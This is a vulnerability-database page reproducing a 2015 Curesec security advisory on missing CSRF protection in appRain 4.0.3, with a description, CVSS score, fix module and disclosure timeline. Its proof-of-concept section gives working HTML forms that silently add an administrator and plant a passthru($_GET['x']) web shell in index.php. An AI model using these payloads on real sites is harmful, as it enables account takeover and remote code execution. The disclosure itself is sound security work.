Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

appRain 4.0.3 Cross Site Request Forgery

🗓️ 10 Dec 2015 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

appRain 4.0.3 CSRF Vulnerability in Data Exchange Securit

Code
`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: appRain 4.0.3  
Fixed in: Fixed via Optional Module  
CSRF Protection Module http://www.apprain.com/extension/20/accounting-system?s  
Link: =Description  
Vendor Website: [email protected]  
Vulnerability Type: CSRF  
Remote Exploitable: Yes  
Reported to vendor: 10/02/2015  
Disclosed to public: 12/02/2015  
Release mode: Coordinated release  
CVE: requested, but not assigned  
Credits Tim Coen of Curesec GmbH  
  
2. Vulnerability Description  
  
CVSS  
  
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P  
  
Description  
  
None of the requests have CSRF protection. This means that an attacker can  
execute actions for an admin if the admin visits an attacker controlled website  
while logged in.  
  
3. Proof of Concept  
  
  
Add new Admin:  
  
<html>  
<body>  
<form action="http://localhost/apprain-source-4.0.3/admin/manage/add/" method="POST">  
<input type="hidden" name="data[Admin][f_name]" value="foo" />  
<input type="hidden" name="data[Admin][l_name]" value="foo" />  
<input type="hidden" name="data[Admin][email]" value="[email protected]" />  
<input type="hidden" name="data[Admin][username]" value="foo" />  
<input type="hidden" name="data[Admin][password]" value="fdnki2@#E@Kkfod" />  
<input type="hidden" name="data[Admin][status]" value="Active" />  
<input type="hidden" name="data[Admin][description]" value="foo" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
Code Execution (using the PHP file editor):  
  
<html>  
<body>  
<form action="http://localhost/apprain-source-4.0.3/appeditor/index?loc=webroot/index.php" method="POST">  
<input type="hidden" name="content" value="<?php  
/**  
* ---  
* appRain CMF  
*  
* LICENSE  
*  
* This source file is subject to the MIT license that is bundled  
* with this package in the file LICENSE.txt.  
* It is also available through the world-wide-web at this URL:  
* http://www.opensource.org/licenses/mit-license.php  
* If you did not receive a copy of the license and are unable to  
* obtain it through the world-wide-web, please send an email  
* to [email protected] so we can send you a copy immediately.  
*  
* @copyright Copyright (c) 2010 appRain, Team. (http://www.apprain.com)  
* @license http://www.opensource.org/licenses/mit-license.php MIT license  
*  
* HELP  
*  
* Official Website  
* http://www.apprain.com/  
*  
* Download Link  
* http://www.apprain.com/download  
*  
* Documents Link  
* http ://www.apprain.com/docs  
*/  
  
if (version_compare(phpversion(), '5.1.0', '<') === true) {  
die("<strong>Whoops, it looks like you have an invalid PHP version.</strong><br /><span>appRain supports PHP 5.1.0 or newer.</span>");  
}  
  
$appLoc = "../app.php";  
  
if (!file_exists($appLoc)) {  
die("appRain core file(s) missing... Get a new copy ");  
}  
  
error_reporting(E_ALL);  
  
require_once $appLoc;  
  
umask(0);  
  
App::Run();  
  
passthru($_GET['x']);" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
The injected code can now be executed here:  
http://localhost/apprain-source-4.0.3/webroot/index.php?x=ls  
  
4. Solution  
  
To mitigate this issue please install the "Data Exchange Security" module:  
  
http://www.apprain.com/extension/20/accounting-system?s=Description  
  
5. Report Timeline  
  
10/02/ Informed Vendor. Mailbox [email protected] is full, used  
2015 [email protected] instead (no reply)  
10/21/ Reminded Vendor of Disclosure Date  
2015  
10/21/ Vendor announces fix  
2015  
~11/02/ Vendor releases optional module for CSRF protection  
2015  
11/04/ Suggested to vendor that CSRF protection should not be optional (no  
2015 reply)  
11/17/ CVE Requested (no reply)  
2015  
12/02/ Disclosed to public  
2015  
  
  
Blog Reference:  
https://blog.curesec.com/article/blog/appRain-403-CSRF-112.html  
  
--  
blog: https://blog.curesec.com  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Romain-Rolland-Str 14-24  
13089 Berlin, Germany  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Dec 2015 00:00Current
0.9Low risk
Vulners AI Score0.9
apprain 4.0.3csrfvulnerabilitydata exchange securitysecurity advisorycuresec research teamoptional module
30